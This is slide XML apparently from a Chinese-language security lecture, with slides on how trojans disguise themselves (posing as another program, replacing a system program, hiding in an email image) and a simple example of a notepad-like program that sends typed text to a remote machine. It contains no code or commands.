                <a:t>2</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="080808"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="组合 12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="611188" y="4144963"/>
            <a:ext cx="8032750" cy="785812"/>
            <a:chOff x="611188" y="4144963"/>
            <a:chExt cx="8033149" cy="785813"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="23" name="Group 2"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="959111" y="414496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6" name="AutoShape 3"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="904" y="2057"/>
                <a:ext cx="3976" cy="662"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 16667"/>
                </a:avLst>
              </a:prstGeom>
              <a:grpFill/>
              <a:ln w="12700" algn="ctr">
                <a:noFill/>
                <a:round/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr fontAlgn="auto">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="zh-CN" altLang="en-US">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17" name="AutoShape 4"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="912" y="2064"/>
                <a:ext cx="3966" cy="326"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 36505"/>
                </a:avLst>
              </a:prstGeom>
              <a:grpFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:rou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49" name="Group 11"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="611188" y="4251325"/>
              <a:ext cx="744168" cy="608013"/>
              <a:chOff x="579" y="1386"/>
              <a:chExt cx="385" cy="383"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3075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pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="30753" name="Group 13"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="587" y="1392"/>
                <a:ext cx="369" cy="369"/>
                <a:chOff x="587" y="1392"/>
                <a:chExt cx="369" cy="369"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="3075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5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5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5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grpSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35860" name="Text Box 32"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="black">
            <a:xfrm>
              <a:off x="1473243" y="428783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lang="zh-CN" altLang="en-US" sz="2800" b="1" smtClean="0">
                  <a:latin typeface="+mn-ea"/>
                  <a:ea typeface="+mn-ea"/>
                </a:rPr>
                <a:t>某个系统程序，被替换成木马程序</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1" smtClean="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30751" name="Text Box 35"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="758089" y="428783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en-US" altLang="zh-CN" sz="2400" b="1">
                  <a:solidFill>
                    <a:srgbClr val="080808"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>3</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="080808"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="611188" y="5368925"/>
            <a:ext cx="8032750" cy="785813"/>
            <a:chOff x="611188" y="5368926"/>
            <a:chExt cx="8033149" cy="785813"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="27" name="Group 2"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="959111" y="5368926"/>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6" name="AutoShape 3"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="904" y="2057"/>
                <a:ext cx="3976" cy="662"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 16667"/>
                </a:avLst>
              </a:prstGeom>
              <a:grpFill/>
              <a:ln w="12700" algn="ctr">
                <a:noFill/>
                <a:round/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr fontAlgn="auto">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="zh-CN" altLang="en-US">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="AutoShape 4"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="912" y="2064"/>
                <a:ext cx="3966" cy="326"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 36505"/>
                </a:avLst>
              </a:prstGeom>
              <a:grpFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:rou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39" name="Group 11"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="611188" y="5475288"/>
              <a:ext cx="744168" cy="608013"/>
              <a:chOff x="579" y="1386"/>
              <a:chExt cx="385" cy="383"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3074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pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="30743" name="Group 13"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="587" y="1392"/>
                <a:ext cx="369" cy="369"/>
                <a:chOff x="587" y="1392"/>
                <a:chExt cx="369" cy="369"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="3074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4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4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4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grpSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35850" name="Text Box 32"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="black">
            <a:xfrm>
              <a:off x="1473243" y="5511801"/>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lang="en-US" altLang="zh-CN" sz="2800" b="1" smtClean="0">
                  <a:latin typeface="+mn-ea"/>
                  <a:ea typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Email</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" smtClean="0">
                  <a:latin typeface="+mn-ea"/>
                  <a:ea typeface="+mn-ea"/>
                </a:rPr>
                <a:t>中某个图片，其实包含了恶意代码</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1" smtClean="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30741" name="Text Box 35"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="758089" y="5511801"/>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en-US" altLang="zh-CN" sz="2400" b="1">
                  <a:solidFill>
                    <a:srgbClr val="080808"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>4</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="080808"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="组合 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="611188" y="1733550"/>
            <a:ext cx="8032750" cy="785813"/>
            <a:chOff x="611188" y="1733551"/>
            <a:chExt cx="8033149" cy="785813"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="Group 2"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="959111" y="1733551"/>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5" name="AutoShape 3"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="904" y="2057"/>
                <a:ext cx="3976" cy="662"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 16667"/>
                </a:avLst>
              </a:prstGeom>
              <a:grpFill/>
              <a:ln w="12700" algn="ctr">
                <a:noFill/>
                <a:round/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr fontAlgn="auto">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="zh-CN" altLang="en-US">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="AutoShape 4"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="912" y="2064"/>
                <a:ext cx="3966" cy="326"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 36505"/>
                </a:avLst>
              </a:prstGeom>
              <a:grpFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:rou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29" name="Group 11"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="611188" y="1839913"/>
              <a:ext cx="744168" cy="608013"/>
              <a:chOff x="579" y="1386"/>
              <a:chExt cx="385" cy="383"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3073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Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="30733" name="Group 13"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="587" y="1392"/>
                <a:ext cx="369" cy="369"/>
                <a:chOff x="587" y="1392"/>
                <a:chExt cx="369" cy="369"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="3073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3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3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sp>
              <p:nvSpPr>
                <p:cNvPr id="3073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p>
                  <a:endParaRPr lang="zh-CN" altLang="en-US">
                    <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30730" name="Text Box 35"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="758089" y="1876426"/>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en-US" altLang="zh-CN" sz="2400" b="1">
                  <a:solidFill>
                    <a:srgbClr val="080808"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>1</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="080808"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="57" name="Text Box 32"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="black">
            <a:xfrm>
              <a:off x="1473243" y="1901826"/>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defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" smtClean="0">
                  <a:latin typeface="+mn-ea"/>
                </a:rPr>
                <a:t>看起来像一个其它用途的程序</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>木马的伪装方法</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72DFFF-1124-4A97-ACB2-F30B7C034DC1}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="标题 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>木马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>示例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="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774651"/>
            <a:ext cx="17287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5411788" y="1347614"/>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r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" smtClean="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>需要一个软件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" smtClean="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="组合 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="1261889"/>
            <a:ext cx="2452688" cy="2571750"/>
            <a:chOff x="608856" y="836712"/>
            <a:chExt cx="2453680" cy="2552154"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="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14290"/>
              <a:ext cx="2450976" cy="2074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p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="608856" y="836712"/>
              <a:ext cx="2450504" cy="47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t>软件下载</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Freeform 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-994613">
            <a:off x="3017838" y="3174826"/>
            <a:ext cx="2392362" cy="625475"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 864"/>
              <a:gd name="T1" fmla="*/ 0 h 394"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 864"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 394"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 864"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 394"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 864"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 394"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 864"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 394"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 864"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 394"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 864"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 394"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 864"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 394"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 864"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 394"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 864"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 394"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 864"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 3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394"/>
              <a:gd name="T35" fmla="*/ 864 w 864"/>
              <a:gd name="T36" fmla="*/ 394 h 3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394">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="50" y="12"/>
                  <a:pt x="89" y="20"/>
                  <a:pt x="144" y="28"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="204" y="50"/>
                  <a:pt x="269" y="47"/>
                  <a:pt x="332" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="352" y="78"/>
                  <a:pt x="378" y="80"/>
                  <a:pt x="404" y="93"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="392" y="144"/>
                  <a:pt x="392" y="190"/>
                  <a:pt x="339" y="208"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="330" y="244"/>
                  <a:pt x="317" y="272"/>
                  <a:pt x="360" y="288"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="382" y="319"/>
                  <a:pt x="474" y="351"/>
                  <a:pt x="512" y="360"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="540" y="367"/>
                  <a:pt x="598" y="374"/>
                  <a:pt x="598" y="374"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="776" y="366"/>
                  <a:pt x="760" y="394"/>
                  <a:pt x="843" y="288"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="845" y="278"/>
                  <a:pt x="846" y="268"/>
                  <a:pt x="850" y="259"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="853" y="253"/>
                  <a:pt x="864" y="244"/>
                  <a:pt x="864" y="244"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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306211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11439"/>
            <a:ext cx="3313112"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4427538" y="3827289"/>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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" smtClean="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>重要数据失窃</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" smtClean="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea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5E-6 3.7037E-7 L 0.31962 -0.04259 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="15972" y="-213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4"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54"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412875"/>
            <a:ext cx="471963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5" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1763713" y="836613"/>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a:ea typeface="方正舒体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>这表面上是一个记事本一样的程序</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:ea typeface="方正舒体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10855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84625"/>
            <a:ext cx="3743325"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7" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5508625" y="2708275"/>
            <a:ext cx="3536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a:ea typeface="方正舒体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>其实在远端的一台机器上</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:ea typeface="方正舒体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:ea typeface="方正舒体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>有一个程序正收集你写的</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:ea typeface="方正舒体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:ea typeface="方正舒体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>所有文字</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:ea typeface="方正舒体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108558" name="AutoShape 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2771775" y="5013325"/>
            <a:ext cx="1368425" cy="1223963"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>网络</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108559" name="Freeform 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1331913" y="4652963"/>
            <a:ext cx="1344612" cy="1008062"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 257 w 847"/>
              <a:gd name="T1" fmla="*/ 0 h 635"/>
              <a:gd name="T2" fmla="*/ 30 w 847"/>
              <a:gd name="T3" fmla="*/ 363 h 635"/>
              <a:gd name="T4" fmla="*/ 438 w 847"/>
              <a:gd name="T5" fmla="*/ 590 h 635"/>
              <a:gd name="T6" fmla="*/ 847 w 847"/>
              <a:gd name="T7" fmla="*/ 635 h 635"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 847"/>
              <a:gd name="T13" fmla="*/ 0 h 635"/>
              <a:gd name="T14" fmla="*/ 847 w 847"/>
              <a:gd name="T15" fmla="*/ 635 h 635"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="847" h="635">
                <a:moveTo>
                  <a:pt x="257" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="128" y="132"/>
                  <a:pt x="0" y="265"/>
                  <a:pt x="30" y="363"/>
